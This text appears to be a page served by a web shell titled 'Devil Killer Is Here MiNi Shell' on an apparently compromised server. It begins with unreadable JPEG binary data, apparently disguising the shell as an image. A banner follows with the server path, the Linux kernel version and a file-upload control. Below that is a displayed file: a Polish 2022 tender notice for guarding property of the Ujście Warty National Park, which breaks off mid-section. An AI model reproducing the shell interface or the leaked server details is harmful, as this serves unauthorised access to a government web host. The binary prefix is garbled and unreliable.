JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221208/0048460201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona mienia w obiektach Parku Narodowego „Ujście Warty” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Park Narodowy &#34;Ujście Warty&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 081005974</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Chyrzyno 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Górzyca</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">69-113</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pnujsciewarty.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pnujsciewarty.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona mienia w obiektach Parku Narodowego „Ujście Warty” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93cdd5e0-7643-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00484602</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00003192/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Ochrona obiektów i mienia w Chyrzynie oraz w Słońsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.12.) Rodzaj wykonawców, którzy mogą ubiegać się o udzielenie zamówienia: </h3> <p class="mb-0">art. 94 ust. 1 pkt 1) ustawy</p> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pnujsciewarty.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja z Wykonawcami pod poniższym linkiem:<br/>https://pnujsciewarty.ezamawiajacy.pl/ lub<br/>https://epuap.gov.pl/wps/portal/strefaklienta/<br/>katalog-spraw/profil-urzedu/parkuw lub<br/>sekretariat@pnujsciewarty.gov.pl,<br/>Szczegółowe informacje o środkach komunikacji elektronicznej przy użyciu których Zamawiający będzie komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej opisane zostały w rozdz. VII SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji:<br/>a) Elektronicznie na adres e-mail: sekretariat@pnujsciewarty.gov.pl lub za pośrednictwem Platformy znajdującej się pod adresem:<br/>https://pnujsciewarty.ezamawiajacy.pl/ w zakładce „Korespondencja” lub za pośrednictwem epuap pod poniższym linkiem:<br/>https://epuap.gov.pl/wps/portal/strefa- klienta/katalog-spraw/profil-urzedu/parkuw<br/>b) Wykonawca, który zamierza przekazywać oświadczenia, wnioski, zawiadomienia oraz informacje za pośrednictwem epuap musi posiadać konto ePUAP.<br/>2. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanym na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wpływu na Platformę lub na epuap.<br/>3. Ogólne zasady korzystania z Platformy, z zastrzeżeniem pkt 8 niniejszego Rozdziału:<br/>a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Parku Narodowego „Ujście Warty”; https://pnujsciewarty.ezamawiajacy.pl/ lub https://oneplace.marketplanet.pl.<br/>b) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>c) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w formie lub postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta,<br/>wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>d) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej.<br/>e) Wymagania techniczne i organizacyjne, związane z korzystaniem Platformy przez Wykonawcę, zostały przedstawione na stronie Platformy w zakładce Regulacje i procedury procesu zakupowego.<br/>4. Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>d) Włączona obsługa JavaScript;<br/>e) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Szczegółowy opis znajduje się w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)	Zamawiający oświadcza, że jest Administratorem danych osobowych w nawiązaniu do art.4 ust. 7 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez Wykonawcę będą przetwarzane przez Zamawiającego zgodnie z zasadami art.5 RODO oraz zgodnie z przepisami krajowymi.<br/>2)	Dane osobowe Wykonawcy będą przetwarzane na podstawie przepisów prawa powszechnie obowiązującego, które nakłada obowiązki prawne na Zamawiającego (art. 6 ust. 1 lit. c RODO) w związku z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych- dalej „ustawa Pzp” w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. Ochrona mienia w obiektach Parku Narodowego „Ujście Warty”<br/>3)	Odbiorcami przekazanych przez Wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania w związku z zasadą jawności udzielania zamówień w oparciu o art.18 oraz art. 74 ustawy Pzp.<br/>4)	Dane osobowe Wykonawcy zawarte w protokole postępowania będą przechowywane, zgodnie z art.78 ustawy Pzp, przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy przekracza 4 lata, Zamawiający przechowuje protokół postępowania wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>5)	Zamawiający nie planuje przetwarzania danych osobowych Wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli Zamawiający będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>6)	Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się w załączniku <br/>nr 7 do SWZ.<br/>7)	Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>-	obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał i przekazał Zamawiającemu w treści oferty lub dokumentów składanych na żądanie Zamawiającego;<br/>-	obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane Wykonawca pozyskał w sposób pośredni, a które to dane Wykonawca przekazuje Zamawiającemu w treści oferty lub dokumentów składanych na żądanie Zamawiającego.<br/>8)	W celu zapewnienia, że Wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, Wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w załączniku nr 1 do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że:<br/>	udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie.<br/>	udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia.<br/>	w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od Zamawiającego potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od Zamawiającego kopii danych osobowych podlegających przetwarzaniu), Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>	skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>	w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>	w przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">A.222.38.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług ochrony mienia w obiektach Parku Narodowego „Ujście Warty”.<br/>2.	Usługa będzie świadczona w miejscu i na obiektach wskazanych poniżej:<br/>1)	ochrona obiektów oraz mienia i obsługa ruchu turystycznego w siedzibie Zamawiającego <br/>w Chyrzynie 1, 69-113 Górzyca (teren posesji o powierzchni 7,2821 ha) i dotyczy m. in. następującego zakresu: <br/>a)	zapewnienia spokoju i porządku w budynku i jego otoczeniu,<br/>b)	podejmowaniu działań polegających na zapobieganiu przestępstwom i wykroczeniom przeciwko mieniu, a także jego dewastacji lub zagarnięciu,<br/>c)	przeciwdziałanie ewentualnym próbom kradzieży mienia stanowiącego majątek Zamawiającego, <br/>d)	obchód obiektu i przeciwdziałanie penetracji terenu przez dziki, okazywanie dziennika obchodów<br/>e)	utrzymanie czystości chodników i ciągów komunikacyjnych przy siedzibie Zamawiającego łącznie ze schodami zewnętrznymi – wejście do budynku siedziby w stanie uniemożliwiającym poślizgnięcie się przechodzących osób (odśnieżenie, posypywanie piaskiem usuwanie skutków gołoledzi itp.),<br/>f)	w przypadku napadu, pożaru lub innych zagrożeń dla chronionego życia lub mienia powiadomienie odpowiednich służb i wyznaczonych pracowników Zamawiającego,<br/>g)	po zakończeniu pełnienia służby zabezpieczenie książek: ewidencji osób oraz pełnienia służby,<br/>h)	każdorazowe reagowanie na obecność osób postronnych w godzinach sprawowania ochrony budynku i odnotowywanie tych czynności w dzienniku, który będzie do wglądu zamawiającego,<br/>i)	budynki:<br/>•	budynek dyrekcji<br/>•	budynek starej pompowni /pomieszczenia warsztatowo-techniczne, muzeum/<br/>•	garaż<br/>•	budynek stacji uzdatniania wody<br/>•	budynek oczyszczalni ścieków<br/>•	ujęcie wody<br/>j)	terminy dyżurowania, <br/>•	w dni powszednie od poniedziałku do czwartku w godzinach od 15:30 do 7:30 dnia następnego,<br/>•	w piątki od 15:30 do 24:00,<br/>•	w soboty od godziny 0:00 – 24:00<br/>•	w niedziele i święta od godziny 00:00 do 7.30 dnia powszedniego.<br/>k)	Obsługa ruchu turystycznego w siedzibie Parku Narodowego „Ujście Warty” <br/>w Chyrzynie 1 polegająca na:<br/>•	obsłudze kasy fiskalnej,<br/>•	pobieraniu opłat za udostępnianie wieży widokowej w Chyrzynie zgodnie z obowiązującym w tym zakresie zarządzeniem Dyrektora Parku <br/>(z zastrzeżeniem, że w 2023 roku planowany jest remont Przyrodniczego Ogrodu Zmysłów oraz wieży widokowej i w tym czasie obsługa ruchu turystycznego zostanie zawieszona, a Wykonawcy przysługiwać będzie wynagrodzenie za faktycznie wykonane godziny obsługi ruchu turystycznego)<br/>l)	zamykanie bramy o godzinie 15.30, a w trakcie trwania obsługi ruchu turystycznego o godzinie 18.00<br/>m)	termin wykonywania obsługi ruchu turystycznego tj.:<br/>•	w dni powszednie od poniedziałku do piątku w godzinach od 15.30 do 18.00<br/>•	w soboty, niedziele i święta od godziny 10:00 do godziny 18:00,<br/><br/>Ww. zakres będzie realizowany w następującym wymiarze godzinowym w okresie realizacji umowy:<br/>I.	Ochrona obiektów imienia: 6 760,00 roboczogodzin<br/>II.	Obsługa ruchu turystycznego: 924,00 roboczogodzin<br/>Łącznie 7 684,00 roboczogodzin<br/><br/>2)	ochrona obiektów oraz mienia w siedzibie Zamawiającego przy ul. 3-Lutego 90, 66-436 Słońsk (teren posesji o powierzchni 2,9143 ha) i dotyczy m. in. następującego zakresu:<br/>a)	nadzorowanie – bieżącego wizualnego monitorowania kontrolek świadczących o gotowości do uruchomienia instalacji p.poż., odymiania, odpowiednie reagowanie na wszystkie sygnały świadczące o nieprawidłowościach zaobserwowanych na tych urządzeniach oraz pozostałych instalacjach wskazanych przez Zamawiającego w dniu rozpoczęcia obowiązywania umowy,<br/>b)	bieżące nadzorowanie systemu przeciwpożarowego - centralki alarmowej oraz prawidłowego działania pozostałych instalacji wskazanych przez Zamawiającego,<br/>c)	bieżące nadzorowanie systemu monitoringu wizyjnego,<br/>d)	zapewnienie spokoju i porządku w budynku i jego otoczeniu, okazywanie dziennika obchodów<br/>e)	podejmowanie działań polegających na zapobieganiu przestępstwom i wykroczeniom przeciwko mieniu, a także jego dewastacji lub zagarnięciu,<br/>f)	przeciwdziałanie ewentualnym próbom kradzieży mienia stanowiącego majątek Zamawiającego, <br/>g)	obchód obiektu i przeciwdziałanie penetracji terenu przez dziki,<br/>h)	utrzymanie czystości chodników i ciągów komunikacyjnych przy siedzibie Zamawiającego – wejście do budynku siedziby w stanie uniemożliwiającym poślizgnięcie się przechodzących osób (odśnieżenie, posypywanie piaskiem usuwanie skutków gołoledzi itp.),<br/>i)	w przypadku napadu, pożaru lub innych zagrożeń dla chronionego życia lub mienia powiadomienie odpowiednich służb i wyznaczonych pracowników Zamawiającego,<br/>j)	po zakończeniu pełnienia służby zabezpieczenie książek: ewidencji osób oraz pełnienia służby,<br/>k)	każdorazowe reagowanie na obecność osób postronnych w godzinach sprawowania ochrony budynku i odnotowywanie tych czynności w dzienniku, który będzie do wglądu zamawiającego,<br/>l)	budynki:<br/>•	budynek Ośrodka Muzealno – Edukacyjnego<br/>•	budynek techniczny,<br/>•	dodatkowo budynek administracyjny oraz dwa budynki mieszkalne czterolokalowe (które to aktualnie są w trakcie budowy – planowany najszybszy termin oddania budynków czerwiec 2023 r.)<br/>m)	terminy dyżurowania:<br/>•	w dni powszednie od poniedziałku do czwartku w godzinach od 15:30 do 7:30 dnia następnego,<br/>•	w piątki od 15:30 do 24:00,<br/>•	w soboty od godziny 00:00 – 24:00<br/>•	w niedziele i święta od godziny 00:00 do 7.30 dnia powszedniego z zastrzeżeniem:<br/>•	od 1 stycznia do 28 lutego oraz od 1 listopada do 31 grudnia: poniedziałek-piątek w godz. 15:30-07:30 dnia następnego; sobota-niedziela w godz. 15:00-09:00 dnia następnego,<br/>•	od 1 marca do 31 października: poniedziałek-piątek w godz. 16:30-07:30 dnia następnego; sobota-niedziela w godz. 17:00-09:00 dnia następnego,<br/>•	dodatkowo w dniu 6 stycznia w godzinach 15:00-09:00 dnia następnego oraz w dniach 1-3 maja, 8 czerwca, 15 sierpnia w godzinach 17:00-09:00 dnia następnego,<br/>•	dni wolne: 1 stycznia, 8-10 kwietnia, 1 listopada, 24-26 grudnia oraz 31 grudnia <br/>n)	w budynku Edukacyjno-Muzealnym zainstalowane są kamery monitorujące, z których obraz eksponowany jest w sposób ciągły na stanowisku ochrony i dodatkowo rejestrowany jest w systemie informatycznym oraz system alarmowy.<br/><br/>Ww. zakres będzie realizowany w wymiarze 5 809,00 roboczogodzin w okresie realizacji umowy.<br/><br/>Szczegółowy zakres zamówienia zawarty jest w rozdz. III SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji<br/>Zamawiający zastrzega sobie prawo zastosowania opcji zgodnie z art. 441 ustawy PZP. Zamawiający ma możliwość zmiany organizacji ochrony polegającej na rezygnacji z godzin świadczenia usług ochrony. Maksymalna liczba godzin opcji wynosi 100. Prawo opcji może być zastosowane w okresie realizacji umowy. Zamawiający ma obowiązek powiadomić pisemnie Wykonawcę o skorzystaniu z prawa opcji przed podpisaniem umowy, lub z 7 dniowym wyprzedzeniem w czasie jej trwania. Skorzystanie z opcji nie wymaga sporządzenia aneksu do umowy. Powiadomienie musi zawierać m. in. zakres oraz wskazanie lokalizacji. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: 